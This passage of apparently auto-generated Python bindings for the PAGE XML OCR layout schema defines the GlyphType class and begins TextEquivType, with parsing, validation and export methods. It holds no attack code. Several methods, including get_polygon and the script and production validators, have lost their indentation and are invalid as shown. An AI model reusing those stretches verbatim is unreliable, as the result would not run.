            self.validate_ProductionSimpleType(self.production)    # validate type ProductionSimpleType
        value = find_attr_value_('custom', node)
        if value is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            self.custom = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Construct the child binding object matching *nodeName_*, build it
        recursively from *child_*, and attach it to this instance (appended
        for list-valued children, assigned for single-valued ones)."""
        if nodeName_ == 'AlternativeImage':
            obj_ = AlternativeImageType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.AlternativeImage.append(obj_)
            obj_.original_tagname_ = 'AlternativeImage'
        elif nodeName_ == 'Coords':
            obj_ = CoordsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Coords = obj_
            obj_.original_tagname_ = 'Coords'
        elif nodeName_ == 'Glyph':
            obj_ = GlyphType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Glyph.append(obj_)
            obj_.original_tagname_ = 'Glyph'
        elif nodeName_ == 'TextEquiv':
            obj_ = TextEquivType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.TextEquiv.append(obj_)
            obj_.original_tagname_ = 'TextEquiv'
        elif nodeName_ == 'TextStyle':
            obj_ = TextStyleType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.TextStyle = obj_
            obj_.original_tagname_ = 'TextStyle'
        elif nodeName_ == 'UserDefined':
            obj_ = UserDefinedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UserDefined = obj_
            obj_.original_tagname_ = 'UserDefined'
        elif nodeName_ == 'Labels':
            obj_ = LabelsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Labels.append(obj_)
            obj_.original_tagname_ = 'Labels'
def get_polygon(self):
'''
Get polygon from element which is parent of a Coords element
'''
points = [point for point in self.Coords.points.split(' ')]
return [[int(coord) for coord in point.split(',')] for point in points]
def get_polygon_string(self):
'''
Get polygon string from element which is parent of a Coords element
'''
return self.Coords.points.replace(' ', ',')
# end class WordType
class GlyphType(GeneratedsSuper):
    """Binding class for the PAGE XML pc:GlyphType element (a glyph inside
    a Word).

    Fragments from the schema annotations: ``script`` is the script used
    for the glyph; ``production`` overrides the production attribute of
    the parent word / text line / text region; ``custom`` is for generic
    use.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema-derived member specification consumed by the generateDS runtime.
    member_data_items_ = [
        MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('ligature', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('symbol', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('script', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('production', 'pc:ProductionSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('AlternativeImage', 'AlternativeImageType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'AlternativeImage', 'type': 'AlternativeImageType'}, None),
        MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
        MemberSpec_('Graphemes', 'GraphemesType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Graphemes', 'type': 'GraphemesType'}, None),
        MemberSpec_('TextEquiv', 'TextEquivType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextEquiv', 'type': 'TextEquivType'}, None),
        MemberSpec_('TextStyle', 'TextStyleType', 0, 1, {'minOccurs': '0', 'name': 'TextStyle', 'type': 'TextStyleType'}, None),
        MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
        MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
    ]
    # Hooks for the generateDS subclassing mechanism (see factory()).
    subclass = None
    superclass = None
    def __init__(self, id=None, ligature=None, symbol=None, script=None, production=None, custom=None, comments=None, AlternativeImage=None, Coords=None, Graphemes=None, TextEquiv=None, TextStyle=None, UserDefined=None, Labels=None, gds_collector_=None, **kwargs_):
        """Initialize a GlyphType binding.  Scalar keyword arguments map to
        XML attributes, the capitalized ones to child elements; list-valued
        children default to fresh empty lists."""
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        # XML attributes (cast to the expected Python type).
        self.id = _cast(None, id)
        self.id_nsprefix_ = None
        self.ligature = _cast(bool, ligature)
        self.ligature_nsprefix_ = None
        self.symbol = _cast(bool, symbol)
        self.symbol_nsprefix_ = None
        self.script = _cast(None, script)
        self.script_nsprefix_ = None
        self.production = _cast(None, production)
        self.production_nsprefix_ = None
        self.custom = _cast(None, custom)
        self.custom_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        # Child elements.
        if AlternativeImage is None:
            self.AlternativeImage = []
        else:
            self.AlternativeImage = AlternativeImage
        self.AlternativeImage_nsprefix_ = "pc"
        self.Coords = Coords
        self.Coords_nsprefix_ = "pc"
        self.Graphemes = Graphemes
        self.Graphemes_nsprefix_ = "pc"
        if TextEquiv is None:
            self.TextEquiv = []
        else:
            self.TextEquiv = TextEquiv
        self.TextEquiv_nsprefix_ = "pc"
        self.TextStyle = TextStyle
        self.TextStyle_nsprefix_ = "pc"
        self.UserDefined = UserDefined
        self.UserDefined_nsprefix_ = "pc"
        if Labels is None:
            self.Labels = []
        else:
            self.Labels = Labels
        self.Labels_nsprefix_ = "pc"
    # Factory that honors the generateDS subclass-substitution mechanism:
    # prefer a subclass registered in CurrentSubclassModule_, then the
    # class-level `subclass` hook, otherwise construct a plain GlyphType.
    def factory(*args_, **kwargs_):
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, GlyphType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if GlyphType.subclass:
            return GlyphType.subclass(*args_, **kwargs_)
        else:
            return GlyphType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # --- generateDS accessor API: namespace prefix ---
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    # --- generateDS accessor API: list-valued AlternativeImage children ---
    def get_AlternativeImage(self):
        return self.AlternativeImage
    def set_AlternativeImage(self, AlternativeImage):
        self.AlternativeImage = AlternativeImage
    def add_AlternativeImage(self, value):
        self.AlternativeImage.append(value)
    def insert_AlternativeImage_at(self, index, value):
        self.AlternativeImage.insert(index, value)
    def replace_AlternativeImage_at(self, index, value):
        self.AlternativeImage[index] = value
    # --- generateDS accessor API: single-valued children ---
    def get_Coords(self):
        return self.Coords
    def set_Coords(self, Coords):
        self.Coords = Coords
    def get_Graphemes(self):
        return self.Graphemes
    def set_Graphemes(self, Graphemes):
        self.Graphemes = Graphemes
    # --- generateDS accessor API: list-valued TextEquiv children ---
    def get_TextEquiv(self):
        return self.TextEquiv
    def set_TextEquiv(self, TextEquiv):
        self.TextEquiv = TextEquiv
    def add_TextEquiv(self, value):
        self.TextEquiv.append(value)
    def insert_TextEquiv_at(self, index, value):
        self.TextEquiv.insert(index, value)
    def replace_TextEquiv_at(self, index, value):
        self.TextEquiv[index] = value
    def get_TextStyle(self):
        return self.TextStyle
    def set_TextStyle(self, TextStyle):
        self.TextStyle = TextStyle
    def get_UserDefined(self):
        return self.UserDefined
    def set_UserDefined(self, UserDefined):
        self.UserDefined = UserDefined
    # --- generateDS accessor API: list-valued Labels children ---
    def get_Labels(self):
        return self.Labels
    def set_Labels(self, Labels):
        self.Labels = Labels
    def add_Labels(self, value):
        self.Labels.append(value)
    def insert_Labels_at(self, index, value):
        self.Labels.insert(index, value)
    def replace_Labels_at(self, index, value):
        self.Labels[index] = value
    # --- generateDS accessor API: XML attributes of the Glyph element ---
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_ligature(self):
        return self.ligature
    def set_ligature(self, ligature):
        self.ligature = ligature
    def get_symbol(self):
        return self.symbol
    def set_symbol(self, symbol):
        self.symbol = symbol
    def get_script(self):
        return self.script
    def set_script(self, script):
        self.script = script
    def get_production(self):
        return self.production
    def set_production(self, production):
        self.production = production
    def get_custom(self):
        return self.custom
    def set_custom(self, custom):
        self.custom = custom
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
def validate_ScriptSimpleType(self, value):
# Validate type pc:ScriptSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Adlm - Adlam', 'Afak - Afaka', 'Aghb - Caucasian Albanian', 'Ahom - Ahom, Tai Ahom', 'Arab - Arabic', 'Aran - Arabic (Nastaliq variant)', 'Armi - Imperial Aramaic', 'Armn - Armenian', 'Avst - Avestan', 'Bali - Balinese', 'Bamu - Bamum', 'Bass - Bassa Vah', 'Batk - Batak', 'Beng - Bengali', 'Bhks - Bhaiksuki', 'Blis - Blissymbols', 'Bopo - Bopomofo', 'Brah - Brahmi', 'Brai - Braille', 'Bugi - Buginese', 'Buhd - Buhid', 'Cakm - Chakma', 'Cans - Unified Canadian Aboriginal Syllabics', 'Cari - Carian', 'Cham - Cham', 'Cher - Cherokee', 'Cirt - Cirth', 'Copt - Coptic', 'Cprt - Cypriot', 'Cyrl - Cyrillic', 'Cyrs - Cyrillic (Old Church Slavonic variant)', 'Deva - Devanagari (Nagari)', 'Dsrt - Deseret (Mormon)', 'Dupl - Duployan shorthand, Duployan stenography', 'Egyd - Egyptian demotic', 'Egyh - Egyptian hieratic', 'Egyp - Egyptian hieroglyphs', 'Elba - Elbasan', 'Ethi - Ethiopic', 'Geok - Khutsuri (Asomtavruli and Nuskhuri)', 'Geor - Georgian (Mkhedruli)', 'Glag - Glagolitic', 'Goth - Gothic', 'Gran - Grantha', 'Grek - Greek', 'Gujr - Gujarati', 'Guru - Gurmukhi', 'Hanb - Han with Bopomofo', 'Hang - Hangul', 'Hani - Han (Hanzi, Kanji, Hanja)', 'Hano - Hanunoo (Hanunóo)', 'Hans - Han (Simplified variant)', 'Hant - Han (Traditional variant)', 'Hatr - Hatran', 'Hebr - Hebrew', 'Hira - Hiragana', 'Hluw - Anatolian Hieroglyphs', 'Hmng - Pahawh Hmong', 'Hrkt - Japanese syllabaries', 'Hung - Old Hungarian (Hungarian Runic)', 'Inds - Indus (Harappan)', 'Ital - Old Italic (Etruscan, Oscan etc.)', 'Jamo - Jamo', 'Java - Javanese', 'Jpan - Japanese', 'Jurc - Jurchen', 'Kali - Kayah Li', 'Kana - Katakana', 'Khar - Kharoshthi', 'Khmr - Khmer', 'Khoj - Khojki', 'Kitl - Khitan large script', 'Kits - Khitan small script', 'Knda - Kannada', 'Kore - Korean (alias for Hangul + Han)', 'Kpel - Kpelle', 'Kthi - Kaithi', 'Lana - Tai Tham (Lanna)', 'Laoo - Lao', 'Latf - Latin (Fraktur variant)', 'Latg - Latin (Gaelic variant)', 'Latn - Latin', 'Leke - Leke', 'Lepc - Lepcha 
(Róng)', 'Limb - Limbu', 'Lina - Linear A', 'Linb - Linear B', 'Lisu - Lisu (Fraser)', 'Loma - Loma', 'Lyci - Lycian', 'Lydi - Lydian', 'Mahj - Mahajani', 'Mand - Mandaic, Mandaean', 'Mani - Manichaean', 'Marc - Marchen', 'Maya - Mayan hieroglyphs', 'Mend - Mende Kikakui', 'Merc - Meroitic Cursive', 'Mero - Meroitic Hieroglyphs', 'Mlym - Malayalam', 'Modi - Modi, Moḍī', 'Mong - Mongolian', 'Moon - Moon (Moon code, Moon script, Moon type)', 'Mroo - Mro, Mru', 'Mtei - Meitei Mayek (Meithei, Meetei)', 'Mult - Multani', 'Mymr - Myanmar (Burmese)', 'Narb - Old North Arabian (Ancient North Arabian)', 'Nbat - Nabataean', 'Newa - Newa, Newar, Newari', 'Nkgb - Nakhi Geba', 'Nkoo - N’Ko', 'Nshu - Nüshu', 'Ogam - Ogham', 'Olck - Ol Chiki (Ol Cemet’, Ol, Santali)', 'Orkh - Old Turkic, Orkhon Runic', 'Orya - Oriya', 'Osge - Osage', 'Osma - Osmanya', 'Palm - Palmyrene', 'Pauc - Pau Cin Hau', 'Perm - Old Permic', 'Phag - Phags-pa', 'Phli - Inscriptional Pahlavi', 'Phlp - Psalter Pahlavi', 'Phlv - Book Pahlavi', 'Phnx - Phoenician', 'Piqd - Klingon (KLI pIqaD)', 'Plrd - Miao (Pollard)', 'Prti - Inscriptional Parthian', 'Rjng - Rejang (Redjang, Kaganga)', 'Roro - Rongorongo', 'Runr - Runic', 'Samr - Samaritan', 'Sara - Sarati', 'Sarb - Old South Arabian', 'Saur - Saurashtra', 'Sgnw - SignWriting', 'Shaw - Shavian (Shaw)', 'Shrd - Sharada, Śāradā', 'Sidd - Siddham', 'Sind - Khudawadi, Sindhi', 'Sinh - Sinhala', 'Sora - Sora Sompeng', 'Sund - Sundanese', 'Sylo - Syloti Nagri', 'Syrc - Syriac', 'Syre - Syriac (Estrangelo variant)', 'Syrj - Syriac (Western variant)', 'Syrn - Syriac (Eastern variant)', 'Tagb - Tagbanwa', 'Takr - Takri', 'Tale - Tai Le', 'Talu - New Tai Lue', 'Taml - Tamil', 'Tang - Tangut', 'Tavt - Tai Viet', 'Telu - Telugu', 'Teng - Tengwar', 'Tfng - Tifinagh (Berber)', 'Tglg - Tagalog (Baybayin, Alibata)', 'Thaa - Thaana', 'Thai - Thai', 'Tibt - Tibetan', 'Tirh - Tirhuta', 'Ugar - Ugaritic', 'Vaii - Vai', 'Visp - Visible Speech', 'Wara - Warang Citi (Varang Kshiti)', 
'Wole - Woleai', 'Xpeo - Old Persian', 'Xsux - Cuneiform, Sumero-Akkadian', 'Yiii - Yi', 'Zinh - Code for inherited script', 'Zmth - Mathematical notation', 'Zsye - Symbols (Emoji variant)', 'Zsym - Symbols', 'Zxxx - Code for unwritten documents', 'Zyyy - Code for undetermined script', 'Zzzz - Code for uncoded script', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ScriptSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ProductionSimpleType(self, value):
# Validate type pc:ProductionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['printed', 'typewritten', 'handwritten-cursive', 'handwritten-printscript', 'medieval-manuscript', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ProductionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.AlternativeImage or
self.Coords is not None or
self.Graphemes is not None or
self.TextEquiv or
self.TextStyle is not None or
self.UserDefined is not None or
self.Labels
):
return True
else:
return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GlyphType', pretty_print=True):
        """Serialize this element to *outfile* as XML at indentation *level*:
        opening tag with attributes, children (if any), closing tag.
        Writes a self-closing tag when there is no child content."""
        # Allow an externally registered namespace definition to override the default.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('GlyphType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Use the tag name the element was originally parsed with, if known.
        if self.original_tagname_ is not None and name_ == 'GlyphType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GlyphType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GlyphType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing element.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GlyphType'):
        """Write this element's XML attributes; ``already_processed`` guards duplicates."""
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
        if self.ligature is not None and 'ligature' not in already_processed:
            already_processed.add('ligature')
            outfile.write(' ligature="%s"' % self.gds_format_boolean(self.ligature, input_name='ligature'))
        if self.symbol is not None and 'symbol' not in already_processed:
            already_processed.add('symbol')
            outfile.write(' symbol="%s"' % self.gds_format_boolean(self.symbol, input_name='symbol'))
        if self.script is not None and 'script' not in already_processed:
            already_processed.add('script')
            outfile.write(' script=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.script), input_name='script')), ))
        if self.production is not None and 'production' not in already_processed:
            already_processed.add('production')
            outfile.write(' production=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.production), input_name='production')), ))
        if self.custom is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GlyphType', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order (AlternativeImage*, Coords?,
        Graphemes?, TextEquiv*, TextStyle?, UserDefined?, Labels*)."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for AlternativeImage_ in self.AlternativeImage:
            namespaceprefix_ = self.AlternativeImage_nsprefix_ + ':' if (UseCapturedNS_ and self.AlternativeImage_nsprefix_) else ''
            AlternativeImage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AlternativeImage', pretty_print=pretty_print)
        if self.Coords is not None:
            namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
            self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
        if self.Graphemes is not None:
            namespaceprefix_ = self.Graphemes_nsprefix_ + ':' if (UseCapturedNS_ and self.Graphemes_nsprefix_) else ''
            self.Graphemes.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Graphemes', pretty_print=pretty_print)
        for TextEquiv_ in self.TextEquiv:
            namespaceprefix_ = self.TextEquiv_nsprefix_ + ':' if (UseCapturedNS_ and self.TextEquiv_nsprefix_) else ''
            TextEquiv_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextEquiv', pretty_print=pretty_print)
        if self.TextStyle is not None:
            namespaceprefix_ = self.TextStyle_nsprefix_ + ':' if (UseCapturedNS_ and self.TextStyle_nsprefix_) else ''
            self.TextStyle.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextStyle', pretty_print=pretty_print)
        if self.UserDefined is not None:
            namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
            self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
        for Labels_ in self.Labels:
            namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
            Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this object from an ElementTree ``node``; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip the namespace from the child tag to get the local name.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read XML attributes from ``node`` into this object, validating
        enumerated/simple types via the gds_collector_."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('ligature', node)
        if value is not None and 'ligature' not in already_processed:
            already_processed.add('ligature')
            # xsd:boolean accepts both 'true'/'false' and '1'/'0'.
            if value in ('true', '1'):
                self.ligature = True
            elif value in ('false', '0'):
                self.ligature = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        value = find_attr_value_('symbol', node)
        if value is not None and 'symbol' not in already_processed:
            already_processed.add('symbol')
            if value in ('true', '1'):
                self.symbol = True
            elif value in ('false', '0'):
                self.symbol = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        value = find_attr_value_('script', node)
        if value is not None and 'script' not in already_processed:
            already_processed.add('script')
            self.script = value
            self.validate_ScriptSimpleType(self.script) # validate type ScriptSimpleType
        value = find_attr_value_('production', node)
        if value is not None and 'production' not in already_processed:
            already_processed.add('production')
            self.production = value
            self.validate_ProductionSimpleType(self.production) # validate type ProductionSimpleType
        value = find_attr_value_('custom', node)
        if value is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            self.custom = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Build one child element by local tag name and attach it to self.
        Repeatable children are appended; single-valued children are assigned."""
        if nodeName_ == 'AlternativeImage':
            obj_ = AlternativeImageType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.AlternativeImage.append(obj_)
            obj_.original_tagname_ = 'AlternativeImage'
        elif nodeName_ == 'Coords':
            obj_ = CoordsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Coords = obj_
            obj_.original_tagname_ = 'Coords'
        elif nodeName_ == 'Graphemes':
            obj_ = GraphemesType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Graphemes = obj_
            obj_.original_tagname_ = 'Graphemes'
        elif nodeName_ == 'TextEquiv':
            obj_ = TextEquivType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.TextEquiv.append(obj_)
            obj_.original_tagname_ = 'TextEquiv'
        elif nodeName_ == 'TextStyle':
            obj_ = TextStyleType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.TextStyle = obj_
            obj_.original_tagname_ = 'TextStyle'
        elif nodeName_ == 'UserDefined':
            obj_ = UserDefinedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UserDefined = obj_
            obj_.original_tagname_ = 'UserDefined'
        elif nodeName_ == 'Labels':
            obj_ = LabelsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Labels.append(obj_)
            obj_.original_tagname_ = 'Labels'
def get_polygon(self):
'''
Get polygon from element which is parent of a Coords element
'''
points = [point for point in self.Coords.points.split(' ')]
return [[int(coord) for coord in point.split(',')] for point in points]
    def get_polygon_string(self):
        '''
        Get polygon string from element which is parent of a Coords element
        '''
        # NOTE(review): this flattens "x1,y1 x2,y2" into "x1,y1,x2,y2"
        # (all separators become commas) — presumably intended by callers;
        # confirm before changing.
        return self.Coords.points.replace(' ', ',')
# end class GlyphType
class TextEquivType(GeneratedsSuper):
    """A textual transcription attached to the parent layout element.

    ``index`` is used for sort order in case multiple TextEquivs are
    defined; the text content with the lowest index should be interpreted
    as the main text content.
    ``conf`` is an OCR confidence value (between 0 and 1).
    ``dataType`` describes the type of text content (is it free text or a
    number, for instance); this is only a descriptive attribute, the text
    type is not checked during XML validation.
    ``dataTypeDetails`` is a refinement for the dataType attribute and can
    be a regular expression, for instance.
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('index', 'indexType', 0, 1, {'use': 'optional'}),
        MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('dataType', 'pc:TextDataTypeSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('dataTypeDetails', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('PlainText', 'string', 0, 1, {'minOccurs': '0', 'name': 'PlainText', 'type': 'string'}, None),
        MemberSpec_('Unicode', 'string', 0, 0, {'name': 'Unicode', 'type': 'string'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, index=None, conf=None, dataType=None, dataTypeDetails=None, comments=None, PlainText=None, Unicode=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = None
        # _cast coerces attribute values to the declared simple type.
        self.index = _cast(int, index)
        self.index_nsprefix_ = None
        self.conf = _cast(float, conf)
        self.conf_nsprefix_ = None
        self.dataType = _cast(None, dataType)
        self.dataType_nsprefix_ = None
        self.dataTypeDetails = _cast(None, dataTypeDetails)
        self.dataTypeDetails_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        self.PlainText = PlainText
        self.PlainText_nsprefix_ = None
        self.Unicode = Unicode
        self.Unicode_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Instantiate this class or a registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, TextEquivType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if TextEquivType.subclass:
            return TextEquivType.subclass(*args_, **kwargs_)
        else:
            return TextEquivType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_PlainText(self):
        return self.PlainText
    def set_PlainText(self, PlainText):
        self.PlainText = PlainText
    def get_Unicode(self):
        return self.Unicode
    def set_Unicode(self, Unicode):
        self.Unicode = Unicode
    def get_index(self):
        return self.index
    def set_index(self, index):
        self.index = index
    def get_conf(self):
        return self.conf
    def set_conf(self, conf):
        self.conf = conf
    def get_dataType(self):
        return self.dataType
    def set_dataType(self, dataType):
        self.dataType = dataType
    def get_dataTypeDetails(self):
        return self.dataTypeDetails
    def set_dataTypeDetails(self, dataTypeDetails):
        self.dataTypeDetails = dataTypeDetails
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
    def validate_indexType(self, value):
        # Validate type indexType, a restriction on integer.
        # NOTE(review): `result` is assigned but never initialized or
        # returned — an artifact of the generateDS template; validation
        # problems are reported through gds_collector_ instead.
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, int):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (int)' % {"value": value, "lineno": lineno, })
                return False
            if value < 0:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on indexType' % {"value": value, "lineno": lineno} )
                result = False
    def validate_ConfSimpleType(self, value):
        # Validate type pc:ConfSimpleType, a restriction on float.
        # Confidence must lie in [0, 1]; out-of-range values are reported
        # via gds_collector_ (see NOTE in validate_indexType re `result`).
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, float):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
                return False
            if value < 0:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
                result = False
            if value > 1:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
                result = False
    def validate_TextDataTypeSimpleType(self, value):
        # Validate type pc:TextDataTypeSimpleType, a restriction on string.
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
